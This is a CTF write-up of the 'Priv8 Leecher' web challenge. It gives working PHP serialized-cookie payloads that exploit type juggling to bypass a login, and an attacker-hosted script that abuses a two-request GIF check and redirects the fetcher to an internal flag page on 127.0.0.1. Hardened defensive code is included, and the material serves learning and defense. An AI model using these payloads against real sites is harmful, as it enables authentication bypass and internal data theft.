EGCERT CTF 2019 - Priv8 Leecher

Abdulrhman Adel
Dec 8, 2019 · 3 min read

Hello all,
Priv8 Leecher was a web challenge from the EGCTF 2019 final round.
I managed to solve it with the help of my teammates Khaled Ibn Al-Walid and Ahmed Ezzat.

We were provided with the source code of login.php. The code looked fine until the comparison, because we control the type of the password variable coming out of the cookie:

$login_data = unserialize(urldecode($_COOKIE['login_data']));
$username = $login_data['username'];
if ($login_data['password'] == $user['password']) {
    $loggedin = 1;
}

We have to bypass the login page with the help of this source code.

login.php

Root Cause

PHP has a feature called "type coercion" or "type juggling". This means that when comparing variables of different types, PHP first converts them to a common, comparable type.

For example, consider comparing the string "7" with the integer 7:

if ("7" == 7) {
    echo 'type juggling';
}

The code outputs "type juggling". This is helpful when you want your program to be flexible with different types of user input, and it is also a major source of security vulnerabilities.

For example, when PHP needs to compare the string "Password2" with the integer 2, it attempts to extract the integer from the string, so the comparison evaluates to true:

("Password2" == 2) -> true

But what if the string being compared does not contain an integer? The string is then converted to 0, so the following comparison also evaluates to true:

("Password" == 0) -> true

Solving

In the serialized object the password was a string, but since I control the type of the password variable, I can change it to a boolean or an integer to bypass the comparison:

a:2:{s:8:"username";s:5:"admin";s:8:"password";b:1;}
(true == "Password") evaluates to -> true

a:2:{s:8:"username";s:5:"admin";s:8:"password";i:0;}
(int(0) == "Password") also evaluates to -> true
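To make the root cause concrete from the defender's side, here is an added example (not the challenge's login.php) that runs the two cookie payloads above through the loose comparison from the writeup and through a hardened check. The `$user` row and the `vulnerable_check`/`hardened_check` function names are my own constructions. On PHP 7.x, where this challenge ran, both payloads pass the vulnerable check; PHP 8 changed number-to-string comparison so that `0 == "Password"` is now false, but `true == "Password"` still holds, so the fix is the same either way.

```php
<?php
// Added example: loose comparison from the writeup next to a hardened check.
// Results described in the text are for PHP 7.x.

// Constructed stand-in for the row the application loads from its user table.
$user = ['username' => 'admin', 'password' => 'Password'];

// The two cookie payloads from the writeup, exactly as login.php would unserialize them.
$payloads = [
    'a:2:{s:8:"username";s:5:"admin";s:8:"password";b:1;}',
    'a:2:{s:8:"username";s:5:"admin";s:8:"password";i:0;}',
];

function vulnerable_check(array $login_data, array $user): bool
{
    // == lets PHP juggle the attacker-controlled type against the stored string.
    return $login_data['password'] == $user['password'];
}

function hardened_check($login_data, array $user): bool
{
    // 1. Refuse anything that is not a string before comparing at all.
    if (!is_array($login_data)
        || !isset($login_data['password'])
        || !is_string($login_data['password'])) {
        return false;
    }
    // 2. Compare as strings only, in constant time (no type juggling).
    //    In real code, store a password_hash() and call password_verify() instead.
    return hash_equals($user['password'], $login_data['password']);
}

foreach ($payloads as $p) {
    // allowed_classes => false stops the cookie from instantiating objects,
    // but it does nothing about what == does; that is what hardened_check fixes.
    $login_data = unserialize($p, ['allowed_classes' => false]);
    printf(
        "%-55s vulnerable=%s hardened=%s\n",
        $p,
        var_export(vulnerable_check($login_data, $user), true),
        var_export(hardened_check($login_data, $user), true)
    );
}
```

The important line is the `is_string` check before the comparison: once the value is known to be a string, `===` or `hash_equals` cannot be coerced into matching a boolean or an integer, regardless of what type the serialized cookie carries.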

After changing the cookie we were logged in to the Priv8 Leecher panel. In index.php there is a function used to upload a GIF from a URL.

I tried to fetch the flag file directly and got:
"Error: Invalid GIF file!!"

I set up a Python listener on my server to inspect the request and noticed that the server sends 2 requests.

The first request checks the MIME type; if it is a valid GIF, the server sends a second request to fetch the GIF content.

We built a PHP script that responds with a valid image to the first request and changes the content of the file on the second request:

<?php
// A marker file records whether the first request has already been served.
$is_here = file_get_contents("/var/www/html/test.txt");
if ($is_here != "test") {
    // First request (the MIME-type check): mark it and return a real GIF.
    file_put_contents("/var/www/html/test.txt", "test");
    echo file_get_contents("img.gif");
} else {
    // Second request (the actual fetch): return different content.
    echo "test";
}
?>

After uploading the GIF file, its content was "test".

And finally, we got the flag by redirecting the second request to the flag file:

<?php
$is_here = file_get_contents("/var/www/html/test.txt");
if ($is_here != "test") {
    // First request: mark it and return a real GIF so the check passes.
    file_put_contents("/var/www/html/test.txt", "test");
    echo file_get_contents("img.gif");
} else {
    // Second request: send the leecher to the flag page on its own host.
    header("location: http://127.0.0.1/priv8leecher/flag.php");
}
?>
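The second bug is a check-then-fetch race: the validated bytes and the stored bytes come from two separate requests, and the fetcher follows a redirect to its own loopback address. As an added example (not the challenge's code), here is how a leecher can fetch once and validate exactly the bytes it keeps, refuse redirects, and refuse private or loopback targets; the function names, `MAX_GIF_BYTES` and the host-resolution step are my own choices.

```php
<?php
// Added example: fetch a remote GIF once, validate the same buffer that is stored,
// and never follow redirects or talk to private/loopback addresses.

const MAX_GIF_BYTES = 2 * 1024 * 1024;

// Check the file content itself, not the Content-Type header the remote side sends.
function is_gif_bytes(string $data): bool
{
    $magic = substr($data, 0, 6);
    return $magic === 'GIF87a' || $magic === 'GIF89a';
}

function fetch_gif_once(string $url): string
{
    $parts = parse_url($url);
    if ($parts === false
        || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        throw new InvalidArgumentException('Only http(s) URLs are allowed');
    }

    // Resolve the host ourselves and refuse loopback, private and reserved ranges,
    // so the leecher cannot be pointed at internal pages such as flag.php.
    $ip = gethostbyname($parts['host']);
    if (filter_var($ip, FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
        throw new RuntimeException('Refusing to fetch from a private or reserved address');
    }

    // One request, one body. follow_location => 0 means a 3xx answer is not followed,
    // so a redirect cannot bypass the address check above.
    $ctx = stream_context_create([
        'http' => [
            'method'          => 'GET',
            'follow_location' => 0,
            'timeout'         => 5,
            'ignore_errors'   => true,
        ],
    ]);
    // Read one byte past the limit so an oversized body is detected, not truncated.
    $body = file_get_contents($url, false, $ctx, 0, MAX_GIF_BYTES + 1);
    if ($body === false) {
        throw new RuntimeException('Fetch failed');
    }
    if (strlen($body) > MAX_GIF_BYTES) {
        throw new RuntimeException('File too large');
    }
    // Validate the exact bytes that will be written to disk.
    if (!is_gif_bytes($body)) {
        throw new RuntimeException('Error: Invalid GIF file!!');
    }
    return $body;
}

// Usage: the caller stores the returned string unchanged.
// file_put_contents('/path/to/uploads/' . bin2hex(random_bytes(8)) . '.gif',
//                   fetch_gif_once($_POST['url']));
```

Validating and storing the same buffer removes the window the two-request trick relies on: there is no second request for the remote server to answer differently. The address check still resolves the name a second time inside `file_get_contents`, so a fully robust version would also pin the resolved IP (connect by IP and set the Host header) to close the DNS rebinding variant.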

./bye
